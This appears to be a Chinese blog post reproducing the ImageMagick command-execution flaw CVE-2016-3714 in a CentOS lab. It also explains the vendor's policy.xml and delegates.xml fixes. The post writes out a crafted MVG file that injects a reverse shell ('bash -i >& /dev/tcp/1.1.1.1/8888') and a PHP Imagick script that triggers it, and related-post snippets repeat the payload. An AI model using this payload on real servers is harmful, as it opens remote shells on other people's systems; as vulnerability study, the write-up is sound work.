关闭

ImageMagick 漏洞复现之路

1864人阅读 评论(0) 收藏 举报
分类:
我的环境是centos7 ,php是PHP 5.4.16,ImageMagick是6.7.8-9正好在影响范围之内,但是官方还是对其官网上所有的安装包进行了修复,所以现在下载下来的任何版本的ImageMagick都是不存在漏洞的,
我们看看官方都是怎么修复的,并且还原漏洞现场
漏洞原理在:https://jiji262.github.io/wooyun_articles/drops/CVE-2016-3714%20-%20ImageMagick%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90.html

首先安装ImageMagick:
参考:http://jingyan.baidu.com/article/91f5db1be6ded11c7f05e3d3.html
yum install ImageMagick
yum install ImageMagick-devel
yum install php-pear
yum -y install php-devel
yum install gcc
pecl install imagick (这个之内在php 5.3的版本以上才能安装成功)
 echo extension=imagick.so >> /etc/php.ini  (这个是将ImageMagick加载到php中)
这个时候我们vim test.mvg

内容是:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'
pop graphic-context

保存,然后

converttest.mvg test.png

发现没有权限

我查看:

/etc/ImageMagick/policy.xml

发现在配置文件里面已经加入了修复配置:

<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>

我删掉这些

然后再运行一下,依然不成功,我继续查看:/etc/ImageMagick/delegates.xml

查找https

发现:

修复前配置文件的https部分:

<delegatedecode="https" command="&quot;curl&quot; -s -k-o &quot;%o&quot; &quot;https:%M&quot;"/>

修复后:

<delegatedecode="https" command="&quot;curl&quot; -s -k-o &quot;%o&quot; &quot;https:%F&quot;"/>

红色部分就是官方修复的位置

将配置文件修改之后:

converttest.mvg test.png

成功出发漏洞,反弹一个shell回本机



写一个php文件来证明这个漏洞:

<?php
$thu= new Imagick();
$thu->readImage('test.mvg');
$thu->writeImage('KKKK.png');
$thu->clear();
$thu->destroy();
unlink("KKKK.png");
?>

phptest.php 来执行一下

成功触发,并且反弹



0
0
查看评论

ImageMagick远程代码执行漏洞分析

1. 漏洞描述 漏洞编号: CVE-2016-3714 发现人员: Slack安全工程师Ryan Hube 漏洞简述: 产生原因是因为字符过滤不严谨所导致的执行代码. 对于文件名传递给后端的命令过滤不足,导致允许多种文件格式转换过程中远程执行代码。 影响版本: ImageMagick6.5.7-...
  • yaofeiNO1
  • yaofeiNO1
  • 2017-08-12 11:57
  • 997

ImageMagick被爆高危漏洞

昨天收到阿里云的漏洞报告邮件,邮件内容 ImageMagick被爆高危漏洞(CVE-2016-3714),此漏洞允许攻击者通过上传恶意构造的图像文件,在目标服务器执行任意代码。黑客可利用此类漏洞盗取权限窃取数据。由于ImageMagick应用十分广泛,目前已确定Wordpress等知名应用受此漏洞影...
  • a454213722
  • a454213722
  • 2016-09-04 12:00
  • 299

ImageMagick漏洞(cve-2016-3714)利用及修复

利用: 如下内容保存为图片格式上传即可(命令部分自行替换) push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/...
  • hrayha
  • hrayha
  • 2016-05-05 17:09
  • 3245

ImageMagick漏洞演示

centos安装 wget http://downloads.jmagick.org/6.4.0/ImageMagick-6.4.0-0.tar.gz tar zvxf ImageMagick-6.4.0-0.tar.gz cd ImageMagick-6.4.0-0 ./config...
  • hello_simon
  • hello_simon
  • 2016-05-05 14:34
  • 1826

Imagetrick 漏洞的实例

t1.php <?php ini_set('display_errors',true); error_reporting(E_ALL); $a++; $src_img = new Imagick('bug.png'); $icon = new Imagick(...
  • leinchu
  • leinchu
  • 2016-05-06 11:56
  • 1558

诶,绕过 disable_function 的新姿势 - ImageMagick 的锅 20160504

先贴链接:http://pastebin.com/aE4sKnCg ImageMagick 的新洞,可以影响司机驾驶。   exp 代码: echo "Disable Functions: " . ini_get('disable_fun...
  • qq_27446553
  • qq_27446553
  • 2016-05-06 15:42
  • 552

ImageMagick

1、官网 http://www.imagemagick.org/script/index.php 列子:http://www.imagemagick.org/Usage/thumbnails/#rounded%5Fborder  示例很好:http://www.imagemagick...
  • lan861698789
  • lan861698789
  • 2012-07-11 23:31
  • 6973

ImageMagick 命令执行漏洞

docker Docker是由一家叫做Dotcloud的公司出品。 Docker是一个由GO语言写的程序运行的容器; 目前云服务的基石是操作系统级别的隔离,在同一台物理服务器上虚拟出多个主机。Docker则实现了一种应用程序级别的隔离; 它改变我们基本的开发、操作单元,由直接操作虚拟主机(VM)...
  • kuiguowei
  • kuiguowei
  • 2018-01-16 09:32
  • 36

ImageMagick 漏洞复现之路

我的环境是centos7 ,php是PHP 5.4.16,ImageMagick是6.7.8-9正好在影响范围之内,但是官方还是对其官网上所有的安装包进行了修复,所以现在下载下来的任何版本的ImageMagick都是不存在漏洞的, 我们看看官方都是怎么修复的,并且还原漏洞现场 漏洞原理在:htt...
  • niexinming
  • niexinming
  • 2016-08-31 15:05
  • 1864

ImageMagick爆高危命令执行漏洞

ImageMagick爆高危命令执行漏洞 0x01 前言        ImageMagick是一套功能强大、稳定而且开源的工具集和开发包,可以用来读、写和处理超过89种基本格式的图片文件,包括流行的TIFF、JPEG、GIF、PNG、PDF以及Photo...
  • qq_29277155
  • qq_29277155
  • 2016-05-09 09:02
  • 13160
    个人资料
    • 访问:177968次
    • 积分:2824
    • 等级:
    • 排名:第14914名
    • 原创:108篇
    • 转载:7篇
    • 译文:0篇
    • 评论:51条
    文章分类